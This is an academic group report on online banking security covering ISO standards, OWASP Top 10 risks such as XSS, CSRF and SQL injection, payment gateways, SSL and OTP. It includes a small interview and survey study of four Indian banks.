FMG 20 C Group 4

FMG 20 C Online Banking Security

Submitted To Prof. V.M. Mathur FMG 20C GROUP 4 Rishi Kalantri Samridh Nagpal Shefali Gupta Udit Bubna Vaibhav Aggarwal Veeneet Jain 201128 201141 201151 201168 201171 201173 Page | 1

FMG 20 C Group 4

Table of Contents
Introduction .................................................................................................................................... 3 Background ..................................................................................................................................... 5 Objective of the study ....................................................................................................................... 8 Literature Review .............................................................................................................................. 9 Methodology................................................................................................................................... 12 Sample Selection ......................................................................................................................... 12 Primary Data ............................................................................................................................... 12 Secondary Data ........................................................................................................................... 12 Statistical Tools ............................................................................................................................ 12 Analysis ........................................................................................................................................... 13 Web Application security risk....................................................................................................... 13 Open Web Application Security Project (OWASP) ........................................................................ 14 Cross-Site Scripting (XSS) ............................................................................................................. 15 Cross-Site Request Forgery (CSRF) ............................................................................................... 17 SQL Injection ............................................................................................................................... 19 Payment Gateways ...................................................................................................................... 21 SSL: Secure Socket Layer .............................................................................................................. 24 OTP: One Time Password ............................................................................................................. 25 Major findings ................................................................................................................................. 26 Recommendations .......................................................................................................................... 26 Further scope of the study............................................................................................................... 27 References ...................................................................................................................................... 28

Page | 2

FMG 20 C Group 4

Online Banking Security

Introduction
While the internet offers enormous advantages and opportunities, it also presents various security risks. With this in mind, banks take extensive steps to protect the information transmitted and processed when banking online. This includes, for example, ensuring that conferential data sent over the internet cannot be accessed or modified by unauthorised third parties. But the banks normally have no influence over the systems used by their customer. The choice is entirely up to the, Moreover, the system selected a PC connected to the internet, for example will usually be used for a number of other applications as well. The systems used by online banking customers are therefore exposed to risks beyond the banks control. For this reason the banks cannot assume liability for them. The banks have a number of measures in place that offer effective protection against attacks when information is sent over the internet or processed by the bank server. Online banking is growing almost everywhere; in the UK, for example, there has been a 168% increase in the number of users between 2001 and 2011. This is easy enough to explain: online banking is convenient for customers, and lets bankers cut their staff costs. But, as banking has moved online, fraud has followed. Losses in the UK from online banking fraud were $21.4m in the period of January to June 2008, an increase of 185% when compared to the same period of the previous year.

While Internet banking brought banks to the desktop, the Mobile banking is bringing it right into users pockets. However, in an age of uncontrolled cyber crime, security is the primary concern. The remarkable increase in cellular phone usage has been followed by an increase in mobile fraud. Many users are concerned about the security aspect when carrying out financial transactions over the mobile network.

Mobile is often the only means of access available for millions of users in many countries. A report published by IMS [62] on Mobile Applications and Services indicates that mobile penetration in many developing markets is far
Page | 3

FMG 20 C Group 4

higher than that of banking or fixed line infrastructure. However, lack of security is seen as the biggest deterrent to the widespread adoption of mobile financial services. KPMG LLP examined trends in the use of mobile technology of more than 4,000 people in 19 countries worldwide, where the 91 % respondents said they had never tried banking through a mobile device, and 48% (those respondents who have not conducted banking through a mobile device) cited security and privacy as the primary reason. This report will investigate the current security within mobile banking in addition to the security in online banking while focusing on users authentication, and also analyse a model that will further enhance access security using RFID.

Page | 4

FMG 20 C Group 4

Background
For several years now, electronic banking platforms have been implemented as an ever more efficient channel through which banking transactions can be done without having to leave the house or office. In the end, however, these home banking platforms are web-based applications that are exposed over the Internet making their users very appealing target formal-intentioned individuals. These are some reasons why e-banking platforms are such an alluring objective for criminals to attack:

Overview of Information Security Standards Information security plays an important role in protecting the assets of an organization. As no single formula can guarantee 100% security, there is a need for a set of benchmarks or standards to help ensure an adequate level of security is attained, resources are used efficiently, and the best security practices are adopted. While information security plays an important role in protecting the data and assets of an organization, we often hear news about security incidents, such as defacement of websites, server hacking and data leakage. Organizations need to be fully aware of the need to devote more resources to the protection of information assets, and information security must become a top concern in both government and business. To address the situation, a number of governments and organizations have set up benchmarks, standards and in some cases, legal regulations on information security to help ensure an adequate level of security is maintained, resources are used in the right way, and the best security practices are adopted. Some industries, such as banking, are regulated, and the guidelines or best
Page | 5

FMG 20 C Group 4

practices put together as part of those regulations often become a de facto standard among members of these industries.

These laws and regulations do a good job of defining the scope of information security and spelling out the role of information security in risk management, they have little to say about what constitutes effective information security or how to achieve it. Fortunately, the International Standards Organization has developed two standards that do precisely that, and by adhering to them banks can go a long way toward satisfying regulatory compliance requirements.

The two standards, ISO 17799 and ISO 27001, together provide a set of best practices and a certification standard for information security. The standards are both derived from a British standard, BS7799, which for many years served as the authority for information security. BS7799 came in two parts; part one, BS7799:1, became ISO 17799, while BS7799:2 became ISO 27001.

ISO 17799 provides best implementing, or maintaining Information security is defined confidentiality (ensuring that authorized to have access), completeness of information (ensuring that authorized users assets when required).

practice recommendations for initiating, information security management systems. within the standard as the preservation of information is accessible only to those integrity (safeguarding the accuracy and and processing methods) and availability have access to information and associated

The standard contains 12 sections: risk assessment and treatment; security policy; organization of information security; asset management; access control; information security incident management; human resources security; physical and environmental security; communications and operations management; information systems acquisition, development and maintenance; business continuity management; and compliance.

Within each section, information security control objectives are specified and a range of controls are outlined that are generally regarded as best practices. For each control, implementation guidance is provided. Each
Page | 6

FMG 20 C Group 4

organization is expected to perform an information security risk assessment prior to implementing controls.

The second standard, ISO 27001, specifies requirements for establishing, implementing, maintaining, and improving an information security management system consistent with the best practices outlined in ISO 17799. Previously, organizations could only be officially certified against the British Standard (or national equivalents) by certification/registration bodies accredited by the relevant national standards organizations. Now the international standard can be used for certification.

ISO 27001 is the first standard in a proposed series of information security standards which will be assigned numbers within the ISO 27000 series. ISO 17799 has been renamed to ISO 27002 in 2007. In the works is ISO 27004 - Information Security Management Metrics and Measurement - currently in draft mode.

Certification is entirely voluntary but is increasingly being demanded from suppliers and business partners who are concerned about information security. Certification against ISO 27001 brings a number of benefits. Independent assessment brings rigor and formality to the implementation process, implying improvements to information security and associated risk reduction, and requires management approval, which promotes security awareness.

Page | 7

FMG 20 C Group 4

Objective of the study

Security breaches can have a far-reaching impact to not only a companys finances, but to their reputation as well. Companies/Banks are required to prove their compliance with these regulations and will be held liable for their failure to do so. There is an expectation from customers, employees, and partnersanyone that entrusts a company with their sensitive information that this information will be protected. Financial organizations must consider all of the potential damage that can be done to their business if sensitive data is lost or stolen lawsuits, negative publicity, loss of sales and customer confidence, and permanently tarnished reputations. Studies have shown that the financial services industry has become a primary target of cyber-attacks on a global scale. This is not surprising considering the highly valuable information that all FSPs collect and maintain on a daily basis. The objective of this report is as follows: To study the various security breaches that can impact the information security of the banks. To understand the current information security standards available. To understand the customer preference for online banking. To understand how the customers have faith in banking online. To understand what security measures have been employed by various banks. To compare and contrast the online security of 2 nationalised and 2 private banks in India. To compare and contrast the security provided in the zonal and branch offices of the banks.

Page | 8

FMG 20 C Group 4

Literature Review
The Internet has played a key role in changing how we interact with other people and how we do business today. As a result of the Internet, electronic commerce has emerged, allowing businesses to more effectively interact with their customers and other corporations inside and outside their industries. One industry that is using this new communication channel to reach its customers is the banking industry. The electronic banking system addresses several emerging trends: customers demand for anytime, anywhere service, product time-to-market imperatives and increasingly complex back-office integration challenges. The challenges that oppose electronic banking are the concerns of security and privacy of information. A review on the literature related to this topic revealed a variety of results. In an extensive study of best security practices in online banking by Easy solutions (Easy Solutions is the only security vendor focused exclusively on fraud prevention; providing anti-phishing services and research, multifactor authentication and anomaly transaction detection), it was noted that Home banking platforms have been implemented as an ever more efficient channel through for banking transactions. However these web-based applications are exposed over the Internet making their users a very appealing target for mal-intentioned individuals. They recommended implementing robust authentication strategies to strengthen the authentication process, not only for pressure in meeting with regulations, but also for the high exposure of e-banking platforms to attacks. One such platform that was recommended was Detect ID; it is the only authentication platform that combines the potentiality of detecting malicious processes during the authentication process with the objective of shielding the authentication cycle from malware. The paper recommends implementing robust authentication strategies to strengthen the authentication process not only for pressure in meeting with regulations but also for the high exposure of e-banking platforms to phishing and pharming attacks which can compromise the organizations image and produce financial losses. Focusing on a multi-layer protection approach is the best alternative for massive authentication processes of applications that are highly exposed on the Internet, including a mix of different factors that allow: Shielding the authentication cycle from malicious processes that can affect the end user's station Providing user-to-site authentication strategies which allow the end-user to verify that the connection is indeed established with the correct site Implementing authentication factors that eliminate user decisions from the authentication equation

Page | 9

FMG 20 C Group 4

Implementing authentication factors based on knowledge (what the bank knows about the end-user) Implementing authentication factors based on something that the user has (OTP, USB Device, etc.) Offering complementary protection for the end-user's station Communicating the occurrence of potential transaction frauds to the end-user

A study on online banking security by Bankenverband, Berlin it was revealed that while the internet offers enormous advantages and opportunities, it also presents various security risks. What are the typical dangers that are faced when using the internet for banking. The most common danger is the third parties accessing, deleting or tampering with data while it is being transmitted or obtaining information under false pretences. The banks have a number of measures in place that offer effective protection against attacks when information is sent over the internet or processed by the banks severs. The study also talks about the steps that need to be taken by the customers to ensure their safety; they should be security conscious when using the internet and can check bank statement regularly.

In a research paper on Using RFID to Enhance Mobile Banking Security by Zakaria Saleh and Izzat Alsmadi it was discussed that how Mobile banking is introducing a new generation of location-independent financial services using mobile terminals which facilitates allowing users to make payments, check balances, transfer money between accounts and generate statements of recent transactions on their cellular phones. While providing , anywhere, anytime banking to the user, the service should be secure and security needs to be implemented at various levels, starting from the SIM card security, mobile software security, and secure customer access to banking services. The focus of this study was on RFID applications in cell phones and more particularly for banking applications. A smartphone with an RFID reader can be placed on a tag located on an equipment and use the wireless network to browse through the Internet. Similar to wireless sensors, RFID enables phones can collect data at real time for many applications such as automatic material, items, weather status tracking, etc. Banks rely on users having their mobile phones with them all the time. Hence, as a mean for security measures, banks can send alerts, anytime, in order to provide an enhanced security and services. This paper analyses the security issues in Mobile Banking, and proposes an improved security to the mobile banking services using RFID. The Radio Frequency Identification (RFID) system at the
Page | 10

FMG 20 C Group 4

very simplest level consists of a tag (or transponder) and reader (or interrogator) with an antenna. Tags can be passive with no power source or active. The technology allows for the transmission of a serial number wirelessly, using radio waves. The study also suggests two ways to integrate RFID with a wireless smartphone: A smartphone with RFID tags and a smartphone with an RFID reader. The first one is a typical cell phone that has embedded or attached an RFID chip with some identification information programmed on it. Its antenna is also equipped with RF antenna to be able to communicate with the RFID readers when they are within the range. The RFID tag information is sent to the reader and the reader can write information back to the phone. On the other hand, the second type contains an RFID reader that can collect data from various RFID tags with also an RF antenna. Best practices for online banking security by Rohit K. Agrawal is an extensive study to provide an introductory knowledge and awareness of the information security standards in financial institutions and their offered services. It also explains the role of authentication and security best practices in these institutions. This research paper contains description about the security breaches and their impact on various organizations. The study gives various insights about the Financial Institutions and their offered services, Information Security Standards, Online Security breaches and their causes, Types of Security breaches, Security Best practices, Role of Authentication, Consequences of poor online security.

Optimised to Fail: Card Readers for Online Banking; a study by Saar Drimer, Steven J. Murdoch, and Ross Anderson. It talks about the Chip Authentication Programme (CAP) that was introduced by banks in Europe to deal with the soaring losses due to online banking fraud. A handheld reader is used together with the customer's debit card to generate one-time codes for both login and transaction authentication.

Page | 11

FMG 20 C Group 4

Methodology
This chapter deals with methodology used to carry out the online Banking security study. It also consists of method of data collection, tools used for data collection, types of sampling used, sample sized used for study and analysis of the study.

Sample Selection
Owing to time constraint and being a learning experience the research was narrowed down to just 4 banks so that an in depth analysis can be carried out. The researchers have used a convenient sampling method. The employees of four banks namely: State Bank of Hyderabad HDFC Bank Kotak Mahindra Bank Deutsche Bank

were interviewed on various questions regarding online banking security.

Primary Data
The Primary Data was collected using a personal Interview conducted with the employees of the 4 banks listed above. Around 5 employees were interviewed on the basis of online banking security. For security reasons the employees could not give exact details, but an idea regarding the technology and processes being used were shared. In addition to the employees a customer satisfaction survey was floated through many channels like email, facebook, twitter etc. and the 52 respondents filled the survey.

Secondary Data
The researchers have gathered material from various online security books, journals and magazines on security. The official website of Open Web Application Security project was also studied to understand the process. Various research articles have been studied to understand the latest innovations in the online banking security.

Statistical Tools
Minitab and MS Excel have been used to analyse the data that has been collected.
Page | 12

FMG 20 C Group 4

Analysis
Web Application security risk
Attackers can potentially use many different paths through your application to do harm to your business or organization. Each of these paths represents a risk that may, or may not, be serious enough to warrant attention. Sometimes, these paths are trivial to find and exploit and sometimes they are extremely difficult. Similarly, the harm that is caused may range from nothing, all the way through putting you out of business. To determine the risk to your organization, you can evaluate the likelihood associated with each threat agent, attack vector, and security weakness and combine it with an estimate of the technical and business impact to your organization. Together, these factors determine the overall risk.

Risk Categorisation This update to the OWASP Top 10 focuses on identifying the most serious risks for a broad array of organizations. For each of these risks, we provide generic information about likelihood and technical impact using the following simple ratings scheme, which is based on the OWASP Risk Rating Methodology.
Attack Vector Weakness Prevalence Weakness Detectability Technical Impact Business Impact Easy Average Difficult Widespread Common Uncommon Easy Average Difficult Severe Moderate Minor ? ? ?

However, only you know the specifics of your environment and your business. For any given application, there may not be a threat agent that
Page | 13

FMG 20 C Group 4

can perform the relevant attack, or the technical impact may not make any difference. Therefore, you should evaluate each risk for yourself, focusing on the threat agents, security controls, and business impacts in your enterprise. Although previous versions of the OWASP Top 10 focused on identifying the most common vulnerabilities, they were also designed around risk. The names of the risks in the Top 10 stem from the type of attack, the type of weakness, or the type of impact they cause. We chose the name that is best known and will achieve the highest level of awareness.

Open Web Application Security Project (OWASP)

The Open Web Application Security Project (OWASP) is an open-source application security project. The OWASP community includes corporations, educational organizations, and individuals from around the world. This community works to create freely-available articles, methodologies, documentation, tools, and technologies. The OWASP Foundation is a charitable organization that supports and manages OWASP projects and infrastructure. It is also a registered non profit in Europe since June 2011. OWASP is not affiliated with any technology company, although it supports the informed use of security technology. OWASP has avoided affiliation as it believes freedom from organizational pressures may make it easier for it to provide unbiased, practical, cost-effective information about application security.[citation needed] OWASP advocates approaching application security by considering the people, process, and technology dimensions.

Page | 14

FMG 20 C Group 4

OWASP Top 10 Application Security Risks - 2010

Injection flaws, such as SQL, OS, and LDAP injection, occur when untrusted data is sent to an interpreter as part of a command or query. The attackers hostile data can trick the interpreter into executing unintended commands or accessing unauthorized data.

A1-Injection

XSS flaws occur whenever an application takes untrusted data and sends it to a web browser without A2-Cross Site Scripting proper validation and escaping. XSS allows attackers to execute scripts in the victims browser which (XSS) can hijack user sessions, deface web sites, or redirect the user to malicious sites. A3-Broken Authentication and Session Management Application functions related to authentication and session management are often not implemented correctly, allowing attackers to compromise passwords, keys, session tokens, or exploit other implementation flaws to assume other users identities. A direct object reference occurs when a developer exposes a reference to an internal implementation object, such as a file, directory, or database key. Without an access control check or other protection, attackers can manipulate these references to access unauthorized data.

A4-Insecure Direct Object References

A CSRF attack forces a logged-on victims browser to send a forged HTTP request, including the A5-Cross Site Request victims session cookie and any other automatically included authentication information, to a Forgery (CSRF) vulnerable web application. This allows the attacker to force the victims browser to generate requests the vulnerable application thinks are legitimate requests from the victim. Good security requires having a secure configuration defined and deployed for the application, frameworks, application server, web server, database server, and platform. All these settings should be defined, implemented, and maintained as many are not shipped with secure defaults. This includes keeping all software up to date, including all code libraries used by the application. Many web applications do not properly protect sensitive data, such as credit cards, SSNs, and authentication credentials, with appropriate encryption or hashing. Attackers may steal or modify such weakly protected data to conduct identity theft, credit card fraud, or other crimes. Many web applications check URL access rights before rendering protected links and buttons. However, applications need to perform similar access control checks each time these pages are accessed, or attackers will be able to forge URLs to access these hidden pages anyway.

A6-Security Misconfiguration

A7-Insecure Cryptographic Storage

A8-Failure to Restrict URL Access

Applications frequently fail to authenticate, encrypt, and protect the confidentiality and integrity of A9-Insufficient Transport sensitive network traffic. When they do, they sometimes support weak algorithms, use expired or Layer Protection invalid certificates, or do not use them correctly. Web applications frequently redirect and forward users to other pages and websites, and use A10-Unvalidated untrusted data to determine the destination pages. Without proper validation, attackers can redirect Redirects and Forwards victims to phishing or malware sites, or use forwards to access unauthorized pages.

Cross-Site Scripting (XSS)

Cross-Site Scripting attacks are a type of injection problem, in which malicious scripts are injected into the otherwise benign and trusted web sites. Cross-site scripting (XSS) attacks occur when an attacker uses a web application to send malicious code, generally in the form of a browser side script, to a different end user. Flaws that allow these attacks to succeed are

Page | 15

FMG 20 C Group 4

quite widespread and occur anywhere a web application uses input from a user in the output it generates without validating or encoding it. An attacker can use XSS to send a malicious script to an unsuspecting user. The end users browser has no way to know that the script should not be trusted, and will execute the script. Because it thinks the script came from a trusted source, the malicious script can access any cookies, session tokens, or other sensitive information retained by your browser and used with that site. These scripts can even rewrite the content of the HTML page.

Cross-Site Scripting (XSS) attacks occur when: Data enters a Web application through an untrusted source, most frequently a web request. The data is included in dynamic content that is sent to a web user without being validated for malicious code.

The malicious content sent to the web browser often takes the form of a segment of JavaScript, but may also include HTML, Flash or any other type of code that the browser may execute. The variety of attacks based on XSS is almost limitless, but they commonly include transmitting private data like cookies or other session information to the attacker, redirecting the victim to web content controlled by the attacker, or performing other malicious operations on the user's machine under the guise of the vulnerable site.

Page | 16

FMG 20 C Group 4

Cross-Site Request Forgery (CSRF)

CSRF is an attack which forces an end user to execute unwanted actions on a web application in which he/she is currently authenticated. With a little help of social engineering (like sending a link via email/chat), an attacker may force the users of a web application to execute actions of the attacker's choosing. A successful CSRF exploit can compromise end user data and operation in case of normal user. If the targeted end user is the administrator account, this can compromise the entire web application.

Cross-Site Request Forgery (CSRF) is an attack that tricks the victim into loading a page that contains a malicious request. It is malicious in the sense that it inherits the identity and privileges of the victim to perform an undesired function on the victim's behalf, like change the victim's e-mail address, home address, or password, or purchase something. CSRF attacks generally target functions that cause a state change on the server but can also be used to access sensitive data. For most sites, browsers will automatically include with such requests any credentials associated with the site, such as the user's session cookie, basic auth credentials, IP address, Windows domain credentials, etc. Therefore, if the user is currently authenticated to the site, the site will have no way to distinguish this from a legitimate user request. In this way, the attacker can make the victim perform actions that they didn't intend to, such as logout, purchase item, change account information,

Page | 17

FMG 20 C Group 4

retrieve account information, vulnerable website.

or

any

other

function

provided

by

the

Sometimes, it is possible to store the CSRF attack on the vulnerable site itself. Such vulnerabilities are called Stored CSRF flaws. This can be accomplished by simply storing an IMG or IFRAME tag in a field that accepts HTML, or by a more complex cross-site scripting attack. If the attack can store a CSRF attack in the site, the severity of the attack is amplified. In particular, the likelihood is increased because the victim is more likely to view the page containing the attack than some random page on the Internet. The likelihood is also increased because the victim is sure to be authenticated to the site already. Synonyms: CSRF attacks are also known by a number of other names, including XSRF, "Sea Surf", Session Riding, Cross-Site Reference Forgery, Hostile Linking. Microsoft refers to this type of attack as a One-Click attack in their threat modelling process and many places in their online documentation. Prevention measures that do NOT work Using a secret cookie Remember that all cookies, even the secret ones, will be submitted with every request. All authentication tokens will be submitted regardless of whether or not the end-user was tricked into submitting the request. Furthermore, session identifiers are simply used by the application container to associate the request with a specific session object. The session identifier does not verify that the end-user intended to submit the request. Only accepting POST requests Applications can be developed to only accept POST requests for the execution of business logic. The misconception is that since the attacker cannot construct a malicious link, a CSRF attack cannot be executed. Unfortunately, this logic is incorrect. There are numerous methods in which an attacker can trick a victim into submitting a forged POST request, such as a simple form hosted in attacker's website with hidden values. This form can be triggered automatically by JavaScript or can be triggered by the victim who thinks form will do something else. Key Concepts of Cross-Site Request Forgery

Page | 18

FMG 20 C Group 4

Malicious requests are sent from a site that a user visits to another site that the attacker believes the victim is validated against. The malicious requests are routed to the target site via the victims browser, which is authenticated against the target site. The vulnerability lies in the affected web application, not the victims browser or the site hosting the CSRF.

Executing a CSRF Attack In a Cross Site Request Forgery attack, the attacker is exploiting how the target web application manages authentication. For CSRF to be exploited the victim must be authenticated against (logged in) to the target site. For instance lets say examplebank.com has online banking that is vulnerable to CSRF. If we visit a page containing a CSRF attack on examplebank.com but we are not currently logged in, nothing happens. We are logged in however, the requests in the attack will be executed as if they were actions that we had intended to do. Preventing Cross-Site Request Forgery (CSRF) Vulnerabilities The most common method to prevent Cross-Site Request Forgery (CSRF) attacks is to append unpredictable challenge tokens to each request and associate them with the users session. Such tokens should at a minimum be unique per user session, but can also be unique per request. By including a challenge token with each request, the developer can ensure that the request is valid and not coming from another source other than the user. Finding and Remediating Cross-Site Request Forgery (CSRF) Vulnerabilities The easiest way to check whether an application is vulnerable is to see if each link and form contains an unpredictable token for each user. Without such an unpredictable token, attackers can forge malicious requests. Focus on the links and forms that invoke state-changing functions, since those are the most important CSRF targets.

SQL Injection
A SQL injection attack consists of insertion or "injection" of a SQL query via the input data from the client to the application. A successful SQL injection exploit can read sensitive data from the database, modify database data (Insert/Update/Delete), execute administration operations on the database (such as shutdown the DBMS), recover the content of a given file present on the DBMS file system and in some cases issue commands to the operating system. SQL injection attacks are a type of injection attack, in which SQL commands are injected into data-plane input in order to effect the execution of predefined SQL commands.
Page | 19

FMG 20 C Group 4

SQL injection attacks allow attackers to spoof identity, tamper with existing data, cause repudiation issues such as voiding transactions or changing balances, allow the complete disclosure of all data on the system, destroy the data or make it otherwise unavailable, and become administrators of the database server. SQL Injection is very common with PHP and ASP applications due to the prevalence of older functional interfaces. Due to the nature of programmatic interfaces available, J2EE and ASP.NET applications are less likely to have easily exploited SQL injections. The severity of SQL Injection attacks is limited by the attackers skill and imagination, and to a lesser extent, defense in depth countermeasures, such as low privilege connections to the database server and so on. In general, consider SQL Injection a high impact severity.

Preventing SQL Injection SQL injection can be prevented if you adopt an input validation technique in which user input is authenticated against a set of defined rules for length, type, and syntax and also against business rules. You should ensure that users with the permission to access the database have the least privileges. Additionally, do not use system administrator accounts like sa for Web applications. Also, you should always make sure that a database user is created only for a specific application and this user is not able to access other applications. Another preventive measure is to remove all stored procedures that are not in use. Use strongly typed parameterized query APIs with placeholder substitution markers, even when calling stored procedures Show care when using stored procedures since they are generally safe from SQL injection. However, be careful as they can be injectable (such as via the use of exec (or concatenating arguments within the stored procedure).

Page | 20

FMG 20 C Group 4

Payment Gateways
There are 3 main ways of accepting payments online. You can use a payment gateway (seamless or non-seamless) to process credit card payments immediately through a payment gateway, you can collect credit card details for offline processing or you can use offline payment methods such as COD, Cheque or Direct Debit and then mark your orders as paid once you check your bank account. A payment gateway is an application service provider service that authorizes payments for e-businesses, online retailers etc.. It is the equivalent of a sale terminal located in most physical retail outlets. Payment gateways protect credit card/ account details by encrypting sensitive information, such as credit card numbers, to ensure that information is passed securely between the customer and the merchant and also between merchant and the payment processor. There are two types of Payment Gateways Seamless Payment Gateways: processes credit cards directly on your online shop website without redirecting the purchasing customer to any 3rd party website. The whole transaction is seamless and takes place in real-time. Non-Seamless Payment Gateways: It redirects the purchasing customer to the PayPal website to process the payment and will redirect the customer back to the online shop after this has been completed.

Working of Payment Gateway

A payment gateway facilitates the transfer of information between a payment portal and the Front End Processor or acquiring bank. A customer places order on website and enters their card details. If the order is via a website, the customer's web browser encrypts the information to be sent. This is done via SSL (Secure Socket Layer) encryption. The merchant forwards the details to their payment gateway. This is another SSL encrypted connection to the payment server hosted by the payment gateway. The payment gateway forwards the transaction information to the payment processor used by the merchant's acquiring bank. The payment processor forwards the transaction information to the card association (e.g., Visa/MasterCard) The credit card issuing bank receives the authorization request and sends a response back to the processor with a response code (i.e. approved or declined).
Page | 21

FMG 20 C Group 4

The processor forwards the response to the payment gateway. The payment gateway receives the response, and forwards it on to the website where it is interpreted to the cardholder and the merchant. The entire process typically takes 23 seconds. The acquiring bank deposits the total of the approved funds in to the merchant's nominated account. The entire process from authorization to settlement to funding typically takes 3 days.

Authorization Process

Customer decides to make an online purchase and inputs his credit card information. Merchants website receives information and sends it to payment processing service.
Page | 22

FMG 20 C Group 4

Processor routes information to bank that issued customer credit card. Issuing bank sends authorization (or declination) to processor. Processor sends result to merchant, where it is decided to accept or reject the purchase.

Settlement Process

Merchant informs payment processing service to settle transactions. Processor validates information and forwards transaction information to issuing bank. Issuing bank transfers funds to processor. Processor routes funds to acquiring bank. Acquiring bank credits merchants bank account. Issuing bank includes merchants charge on customers credit card account.

Types of Payment Gateways COM based gateways

Requires merchant to have own SSL certificate. Requires hosting server to have DLL software installed provided by gateway company.

XML transport gateways

Requires own SSL certificate Does not require DLL, compatible with windows based servers.

FORM based gateways

Sometimes require own SSL certificate.

Page | 23

FMG 20 C Group 4

Do not require any extra software to be installed on web hosting server.

Security Issues

Authentication of Credit card and credit card holder possible with CVV & personal details only. Recorded session transmission and replayed attacks. Since the customer is required to enter personal details, the entire communication is often carried out through HTTPS protocol. To validate the request of the payment page result, sometimes IP of the requesting server has to be verified. There is a growing support by acquirers, issuers and subsequently by payment gateways for Virtual Payer Authentication (VPA), implemented as 3-D Secure protocol - branded as Verified by VISA, MasterCard SecureCode and J/Secure by JCB, which adds additional layer of security for online payments.

SSL: Secure Socket Layer

Secure Sockets Layer (SSL), are cryptographic protocols that provide communication security over the Internet. TLS and SSL encrypt the segments of network connections above the Transport Layer, using asymmetric cryptography for key exchange, symmetric encryption for privacy, and message authentication codes for message integrity. Has various Security Measures Protection against a downgrade of the protocol to a previous (less secure) version or a weaker cipher suite. Numbering subsequent Application records with a sequence number and using this sequence number in the message authentication codes (MACs). Using a message digest enhanced with a key (so only a key-holder can check the MAC). In the end the handshake ("Finished") sends a hash of all the exchanged handshake messages seen by both parties. SSL 3.0 improved upon SSL 2.0 by adding SHA-1 based ciphers and support for certificate authentication.

Page | 24

FMG 20 C Group 4

OTP: One Time Password

A one-time password (OTP) is a password that is valid for only one login session or transaction. The most important shortcoming that is addressed by OTPs is that, in contrast to static passwords, they are not vulnerable to replay attacks. An OTP may be generated by devices and be based upon Time synchronization: Use of RSA SecureID tokens. Mathematical Algorithms: A together to create an OTP. Methods of delivery of OTP Proprietary tokens Web based or through emails Mobile Phones Paper few unknown mathematical functions come

Page | 25

FMG 20 C Group 4

Major findings
1. Various security breaches that can impact the security of the bank. : Injection Cross site scripting Broken Authentication and Session Management Insecure Direct Object References Cross Site Request Forgery (CSRF) Security Misconfiguration Insecure Cryptographic Storage Failure to Restrict URL Access Insufficient Transport Layer Protection Invalidated Redirects and Forwards 2. The current information security standards available. 3. Customers prefer private banks for online banking. 4. With all the security measures in place customers have increased faith in banking online. 5. Security measures that have been employed by various banks included in our sample. 6. Private Banks have more stringent security systems in place than nationalized banks.

Recommendations
Nationalized banks should opt for state of the art modern security mechanism. Banks could employ new RSA secure codes token for OTP alternatives Using data cards as authentication would add to the security measures. Certifying authorities play a huge role in checking the online banking security.

Page | 26

FMG 20 C Group 4

Further scope of the study

Due to limited resources our sample size was restricted to just four banks (one nationalized and three private banks). Time was the biggest constraint that we had during our research due to which we only included zonal offices for our research. Provided the resources we can also conduct a study where we can compare Indian banks with the global standards. Given the time, we can conduct customer satisfaction survey on a national level.

Page | 27

FMG 20 C Group 4

References
Online Banking Security, seventh edition, Information for online banking users, Berlin, 2007 Using RFID to Enhance Mobile Banking Security, Zakaria Saleh, Izzat Alsmadi, Yarmouk University, Irbid, Jordan BEST PRACTICES FOR ONLINE BANKING SECURITY, Rohit K. Agrawal, MISM 799 https://www.owasp.org/index.php/Cross-Site_Request_Forgery_(CSRF) https://www.owasp.org/index.php/Main_Page http://www.veracode.com/security/xss http://www.verisign.com/in/ https://www.owasp.org/index.php/SQL_Injection http://www.cisco.com/en/US/prod/collateral/vpndevc/ps5879/ps6264/ ps5888/prod_white_paper0900aecd8011e927.html

Page | 28